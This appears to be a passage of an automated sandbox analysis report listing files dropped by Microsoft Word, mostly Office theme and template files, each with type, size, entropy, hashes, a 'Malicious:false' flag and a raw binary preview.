                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft OOXML
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1091485
                                                                                                                            Entropy (8bit):7.906659368807194
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24576:oBpmCkw3Tg/euEB+UdoC4k7ytHkHA6B/puqW2MIkTeSBmKrZHQ:MR3c/AseydwppC7veSBmWHQ
                                                                                                                            MD5:2192871A20313BEC581B277E405C6322
                                                                                                                            SHA1:1F9A6A5E10E1C3FFEB6B6725C5D2FA9ECDF51085
                                                                                                                            SHA-256:A06B302954A4C9A6A104A8691864A9577B0BFEA240B0915D9BEA006E98CDFFEC
                                                                                                                            SHA-512:6D8844D2807BB90AEA6FE0DDDB9C67542F587EC9B7FC762746164B2D4A1A99EF8368A70C97BAD7A986AAA80847F64408F50F4707BB039FCCC509133C231D53B9
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK...........G`.jaV....P......[Content_Types].xml...n.@...W......T@.mwM.E....)....y...H}.N..ll8.h5g6Q.=3_......?...x..e^Di.p.^.ud...(Y/..{w..r..9.../M...Q*{..E...(.4..>..y,.>..~&..b-.a.?..4Q2Q=.2.......m....>-....;]......N'..A...g.D.m.@(}..'.3Z....#....(+....-q<uq.+....?....1.....Y?Oy......O"..J?....Q$zT.].7.N..Q Wi.....<.........-..rY....hy.x[9.b.%-<.V?.(......;r.+...Q<.;U.....4...!'k...s.&..)'k...d.s..}R....o".D.I..7..7.KL.7..Z.....v..b.5.2].f....l.t....Z...Uk...j.&.U-....&>.ia1..9lhG..Q.P.'P.U}.k..rU..rU..rU..rU..rU..rU..rU..rU_EK_}.zi.....G.........j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..h.oT/-c..`....7FaBu.@-W.A.]..U}H.U}H.U}H.U}H.U}H.U}H.U}H.U}.-}...e...,..7...&(L.....>.kw...i...i...i...i...i...i...i.......I...U_.....vT.....}..\...v..W.!-W.!-W.!-W.!-W.!-W.!-W.!-W.U...7.....k.pT...0..O.... ...>..>..>..>..>..>..>......f..2V}....W>jO....5..].?.o..oPK...........G.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70.
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):280
                                                                                                                            Entropy (8bit):3.5301133500353727
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:Q+sxnxUXp2pRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyZ2vymD0wbnKNAH/lMz1
                                                                                                                            MD5:1C5D58A5ED3B40486BC22B254D17D1DD
                                                                                                                            SHA1:69B8BB7B0112B37B9B5F9ADA83D11FBC99FEC80A
                                                                                                                            SHA-256:EBE031C340F04BB0235FE62C5A675CF65C5CC8CE908F4621A4F5D7EE85F83055
                                                                                                                            SHA-512:4736E4F26C6FAAB47718945BA54BD841FE8EF61F0DBA927E5C4488593757DBF09689ABC387A8A44F7C74AA69BA89BEE8EA55C87999898FEFEB232B1BA8CC7086
                                                                                                                            Malicious:false
                                                                                                                            Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .G.a.l.l.e.r.y...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft OOXML
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1750795
                                                                                                                            Entropy (8bit):7.892395931401988
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24576:DyeAqDJpUDH3xk8ZKIBuX3TPtd36v4o5d4PISMETGBP6eUP+xSeW3v0HKPsc:uRqUjSTPtd36AFDM/BP6eUeW3v0Fc
                                                                                                                            MD5:529795E0B55926752462CBF32C14E738
                                                                                                                            SHA1:E72DFF8354DF2CB6A5698F14BBD1805D72FEEAFF
                                                                                                                            SHA-256:8D341D1C24176DC6B67104C2AF90FABD3BFF666CCC0E269381703D7659A6FA05
                                                                                                                            SHA-512:A51F440F1E19C084D905B721D0257F7EEE082B6377465CB94E677C29D4E844FD8021D0B6BA26C0907B72B84157C60A3EFEDFD96C16726F6ABEA8D896D78B08CE
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):280
                                                                                                                            Entropy (8bit):3.528155916440219
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:Q+sxnxUXcmlDuRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyMmloymD0wbnKNAH/lMz1
                                                                                                                            MD5:AA7B919B21FD42C457948DE1E2988CB3
                                                                                                                            SHA1:19DA49CF5540E5840E95F4E722B54D44F3154E04
                                                                                                                            SHA-256:5FFF5F1EC1686C138192317D5A67E22A6B02E5AAE89D73D4B19A492C2F5BE2F9
                                                                                                                            SHA-512:01D27377942F69A0F2FE240DD73A1F97BB915E19D3D716EE4296C6EF8D8933C80E4E0C02F6C9FA72E531246713364190A2F67F43EDBE12826A1529BC2A629B00
                                                                                                                            Malicious:false
                                                                                                                            Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .D.r.o.p.l.e.t...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft OOXML
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):2218943
                                                                                                                            Entropy (8bit):7.942378408801199
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:49152:8mwK3gH/l4hM06Wqnnl1IdO9wASFntrPEWNe7:863gHt4hM9WWnMdO9w35PEWK
                                                                                                                            MD5:EE33FDA08FBF10EF6450B875717F8887
                                                                                                                            SHA1:7DFA77B8F4559115A6BF186EDE51727731D7107D
                                                                                                                            SHA-256:5CF611069F281584DE3E63DE8B99253AA665867299DC0192E8274A32A82CAA20
                                                                                                                            SHA-512:AED6E11003AAAACC3FB28AE838EDA521CB5411155063DFC391ACE2B9CBDFBD5476FAB2B5CC528485943EBBF537B95F026B7B5AB619893716F0A91AEFF076D885
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK.........{MBS'..t...ip......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.._..w._..w._..w._..w._..w._..w.n..Ofu.-..K.e........T..q.F...R[...~.u.....Z..F....7.?.v....5O....zot..i.....b...^...Z...V...R...N...r./.?........=....#.`..\~n.n...)J./.......7........+......Q..]n............w......Ft........|......b...^...Z...V...R...N..W<x......l._...l..?.A......x....x.9.|.8..............u................w#.....nD..]...........R.......R.......R........o...].`.....A....#.`..\.....+J./.......7........+......Q..]n.........w9~7......Ft........|......b...^.c..-...-...-
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):278
                                                                                                                            Entropy (8bit):3.544065206514744
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:Q+sxnxUXCARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyy6ymD0wbnKNAH/lMz1
                                                                                                                            MD5:06B3DDEFF905F75FA5FA5C5B70DCB938
                                                                                                                            SHA1:E441B94F0621D593DC870A27B28AC6BE3842E7DB
                                                                                                                            SHA-256:72D49BDDE44DAE251AEADF963C336F72FA870C969766A2BB343951E756B3C28A
                                                                                                                            SHA-512:058792BAA633516037E7D833C8F59584BA5742E050FA918B1BEFC6F64A226AB3821B6347A729BEC2DF68BB2DFD2F8E27947F74CD4F6BDF842606B9DEDA0B75CC
                                                                                                                            Malicious:false
                                                                                                                            Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .D.a.m.a.s.k...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft OOXML
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):2357051
                                                                                                                            Entropy (8bit):7.929430745829162
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:49152:tfVcGO3JiR6SgT7/bOCrKCsaFCX3CzwovQTSwW8nX:pVcG2iRedsaoXSzeOwWEX
                                                                                                                            MD5:5BDE450A4BD9EFC71C370C731E6CDF43
                                                                                                                            SHA1:5B223FB902D06F9FCC70C37217277D1E95C8F39D
                                                                                                                            SHA-256:93BFC6AC1DC1CFF497DF92B30B42056C9D422B2321C21D65728B98E420D4ED50
                                                                                                                            SHA-512:2365A9F76DA07D705A6053645FD2334D707967878F930061D451E571D9228C74A8016367525C37D09CB2AD82261B4B9E7CAEFBA0B96CE2374AC1FAC6B7AB5123
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):276
                                                                                                                            Entropy (8bit):3.516423078177173
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:Q+sxnxUX7kARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny5ymD0wbnKNAH/lMz1
                                                                                                                            MD5:5402138088A9CF0993C08A0CA81287B8
                                                                                                                            SHA1:D734BD7F2FB2E0C7D5DB8F70B897376ECA935C9A
                                                                                                                            SHA-256:5C9F5E03EEA4415043E65172AD2729F34BBBFC1A1156A630C65A71CE578EF137
                                                                                                                            SHA-512:F40A8704F16AB1D5DCD861355B07C7CB555934BB9DA85AACDCF869DC942A9314FFA12231F9149D28D438BE6A1A14FCAB332E54B6679E29AD001B546A0F48DE64
                                                                                                                            Malicious:false
                                                                                                                            Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .S.l.a.t.e...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft OOXML
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):2924237
                                                                                                                            Entropy (8bit):7.970803022812704
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:49152:mc4NEo4XNd5wU5qTkdC4+K9u5b/i40RKRAO/cLf68wy9yxKrOUURBgmai2prH:mJef5yTSoKMF//DRGJwLx9DBaH
                                                                                                                            MD5:5AF1581E9E055B6E323129E4B07B1A45
                                                                                                                            SHA1:B849F85BCAF0E1C58FA841FFAE3476D20D33F2DD
                                                                                                                            SHA-256:BDC9FBF81FBE91F5BF286B2CEA00EE76E70752F7E51FE801146B79F9ADCB8E98
                                                                                                                            SHA-512:11BFEF500DAEC099503E8CDB3B4DE4EDE205201C0985DB4CA5EBBA03471502D79D6616D9E8F471809F6F388D7CBB8B0D0799262CBE89FEB13998033E601CEE09
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK.........{MB.$<.~....p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^.......H^..<}...lA-.D.....lI/...hD.Z....|VM..ze........L..tU...g....lQ....Y...>MI...5-....S......h=..u.h..?;h...@k...h...'Z...D...;.....h=..'Z...D...;.....)^./.../U.../..../U.../..../U..?...'.........Ngz..A.~.8.#D....xot.u.?...eyot.n..{..sk....[......Z..F....l...o)..o..o...oi..o)..o..,..b.s......2.C.z.~8.......f......x.9.|.8..............u................r.nD..]...........w.~7...-...-...-...-...-...-....x.&l........>.4.z.~8..........=E....As.1..q. 9....w.7...1........w.}7......Ft...................o)..o..o...oi..o)..o..w.7a...x0...........d0..............A.......Fl.............Ft................w#...r.nD..]..M...K1.0..7....
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):286
                                                                                                                            Entropy (8bit):3.5434534344080606
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:Q+sxnxUXIc5+RELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny4KcymD0wbnKNAH/lMz1
                                                                                                                            MD5:C9812793A4E94320C49C7CA054EE6AA4
                                                                                                                            SHA1:CC1F88C8F3868B3A9DE7E0E5F928DBD015234ABA
                                                                                                                            SHA-256:A535AE7DD5EDA6D31E1B5053E64D0D7600A7805C6C8F8AF1DB65451822848FFC
                                                                                                                            SHA-512:D28AADEDE0473C5889F3B770E8D34B20570282B154CD9301932BF90BF6205CBBB96B51027DEC6788961BAF2776439ADBF9B56542C82D89280C0BEB600DF4B633
                                                                                                                            Malicious:false
                                                                                                                            Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .M.a.i.n._.E.v.e.n.t...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft OOXML
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):3078052
                                                                                                                            Entropy (8bit):7.954129852655753
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:49152:bSEjlpY8skyFHuj2yY0ciM9U2NCVBB4YFzYFw7IaJE2VRK+Xn9DOOe9pp9N9Hu:bfp5sksA3cimUVxV05aJE2fKaDOXdN9O
                                                                                                                            MD5:CDF98D6B111CF35576343B962EA5EEC6
                                                                                                                            SHA1:D481A70EC9835B82BD6E54316BF27FAD05F13A1C
                                                                                                                            SHA-256:E3F108DDB3B8581A7A2290DD1E220957E357A802ECA5B3087C95ED13AD93A734
                                                                                                                            SHA-512:95C352869D08C0FE903B15311622003CB4635DE8F3A624C402C869F1715316BE2D8D9C0AB58548A84BBB32757E5A1F244B1014120543581FDEA7D7D9D502EF9C
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK..........1AS'......ip......[Content_Types].xml..n.@.._......8ie'......}.......(y...H}......3Fi..%2.v?..3..._...d=..E.g.....7.i.-.t5.6......}}.m9r.......m...ML.g.M.eV$.r..*.M..l0...A...M..j;.w={o.f..F....i..v......5..d;..D.ySa...M&..qd*w>.O.{h...|w..5.]..'.CS<.:8C}.g.|E.../..>..].Tnml..I.......r.Gv.E....7.;.E......4/l.....6.K.C?1qz.O.v_..r......\c.c.>..lS........X.N.3N.sN..N.)'.%'..'..N.pL.E...T.!..CR....Ie..k.o..M..w.B.0}..3....v..+....,.q..pz.......v{.;....s3.|..V..ZZ......0.[.....x.....!.!~.8.e..n..&.}p....s.i.. ..[]...q.r....~..+.A\...q............e.-)h9..."Z.>...5-C..`..g.}........r.A.+..\...r.>.... .W.\...re?..%.-/hiA..ZR.r.W.D.\}.EK..kZ.>......5..9.&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^h....L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i..`..G..j..).&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^j..K.L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i.
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):274
                                                                                                                            Entropy (8bit):3.5303110391598502
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:Q+sxnxUXzRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnylymD0wbnKNAH/lMz1
                                                                                                                            MD5:8D1E1991838307E4C2197ECB5BA9FA79
                                                                                                                            SHA1:4AD8BB98DC9C5060B58899B3E9DCBA6890BC9E93
                                                                                                                            SHA-256:4ABA3D10F65D050A19A3C2F57A024DBA342D1E05706A8A3F66B6B8E16A980DB9
                                                                                                                            SHA-512:DCDC9DB834303CC3EC8F1C94D950A104C504C588CE7631CE47E24268AABC18B1C23B6BEC3E2675E8A2A11C4D80EBF020324E0C7F985EA3A7BBC77C1101C23D01
                                                                                                                            Malicious:false
                                                                                                                            Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .M.e.s.h...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft OOXML
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):3611324
                                                                                                                            Entropy (8bit):7.965784120725206
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:49152:ixc1kZBIabo4dTJyr3hJ50gd9OaFxTy+1Nn/M/noivF0po3M0h0Vsm:ixcaAabT83hJLdoaFxTygxcoiX3M0iCm
                                                                                                                            MD5:FB88BFB743EEA98506536FC44B053BD0
                                                                                                                            SHA1:B27A67A5EEC1B5F9E7A9C3B76223EDE4FCAF5537
                                                                                                                            SHA-256:05057213BA7E5437AC3B8E9071A5577A8F04B1A67EFE25A08D3884249A22FBBF
                                                                                                                            SHA-512:4270A19F4D73297EEC910B81FF17441F3FC7A6A2A84EBA2EA3F7388DD3AA0BA31E9E455CFF93D0A34F4EC7CA74672D407A1C4DC838A130E678CA92A2E085851C
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):288
                                                                                                                            Entropy (8bit):3.5359188337181853
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:Q+sxnxUXe46x8RELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyO3UymD0wbnKNAH/lMz1
                                                                                                                            MD5:0FEA64606C519B78B7A52639FEA11492
                                                                                                                            SHA1:FC9A6D5185088318032FD212F6BDCBD1CF2FFE76
                                                                                                                            SHA-256:60059C4DD87A74A2DC36748941CF5A421ED394368E0AA19ACA90D850FA6E4A13
                                                                                                                            SHA-512:E04102E435B8297BF33086C0AD291AD36B5B4A97A59767F9CAC181D17CFB21D3CAA3235C7CD59BB301C58169C51C05DDDF2D637214384B9CC0324DAB0BB1EF8D
                                                                                                                            Malicious:false
                                                                                                                            Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .V.a.p.o.r._.T.r.a.i.l...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):274
                                                                                                                            Entropy (8bit):3.4699940532942914
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:fxnxUXGWWYlIWimoa2nRE3QepmlJ0+3FbnKfZObdADxp1RDWlVwv:fxny2WzIgN2RGHmD0wbnKYZAH+Vwv
                                                                                                                            MD5:55BA5B2974A072B131249FD9FD42EB91
                                                                                                                            SHA1:6509F8AC0AA23F9B8F3986217190F10206A691EA
                                                                                                                            SHA-256:13FFAAFFC987BAAEF7833CD6A8994E504873290395DC2BD9B8E1D7E7E64199E7
                                                                                                                            SHA-512:3DFB0B21D09B63AF69698252D073D51144B4E6D56C87B092F5D97CE07CBCF9C966828259C8D95944A7732549C554AE1FF363CB936CA50C889C364AA97501B558
                                                                                                                            Malicious:false
                                                                                                                            Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .I.n.s.i.g.h.t. .d.e.s.i.g.n. .s.e.t...d.o.t.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.W.D. .D.o.c.u.m.e.n.t. .P.a.r.t.s.}.........
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft Word 2007+
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):3465076
                                                                                                                            Entropy (8bit):7.898517227646252
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:98304:n8ItVaN7vTMZ9IBbaETXbI8ItVaN7vTMZ9IBbaEiXbY:8ItwNX9BvTvItwNX9BvoM
                                                                                                                            MD5:8BC84DB5A3B2F8AE2940D3FB19B43787
                                                                                                                            SHA1:3A5FE7B14D020FAD0E25CD1DF67864E3E23254EE
                                                                                                                            SHA-256:AF1FDEEA092169BF794CDC290BCA20AEA07AC7097D0EFCAB76F783FA38FDACDD
                                                                                                                            SHA-512:558F52C2C79BF4A3FBB8BB7B1C671AFD70A2EC0B1BDE10AC0FED6F5398E53ED3B2087B38B7A4A3D209E4F1B34150506E1BA362E4E1620A47ED9A1C7924BB9995
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK.........Y5B................[Content_Types].xml ...(.................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^.....g.../i..b../..}.-......U.....o.7B.......}@[..4o...E9n..h...Y....D.%......F....g..-!.|p.....7.pQVM.....B.g.-.7....:...d.2...7bA..Us.z.`.r..,.m."..n....s.O^.....fL.........7.....-...gn,J..iU..$.......i...(..dz.....3|
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft Cabinet archive data, many, 4313 bytes, 2 files, at 0x44 "chevronaccent.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):20457
                                                                                                                            Entropy (8bit):7.612540359660869
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:384:KyeISBuydn5rpmp77G8E0GftpBjE/kFLrHRN7ngslI66YVj:KHISBvd5rpmFG8Pi6/6nK666j
                                                                                                                            MD5:4EFA48EC307EAF2F9B346A073C67FCFB
                                                                                                                            SHA1:76A7E1234FF29A2B18C968F89082A14C9C851A43
                                                                                                                            SHA-256:3EE9AE1F8DAB4C498BD561D8FCC66D83E58F11B7BB4B2776DF99F4CDA4B850C2
                                                                                                                            SHA-512:2705644D501D85A821E96732776F61641FE82820FD6A39FFAF54A45AD126C886DC36C1398CDBDBB5FE282D9B09D27F9BFE7F26A646F926DA55DFF28E61FBD696
                                                                                                                            Malicious:false
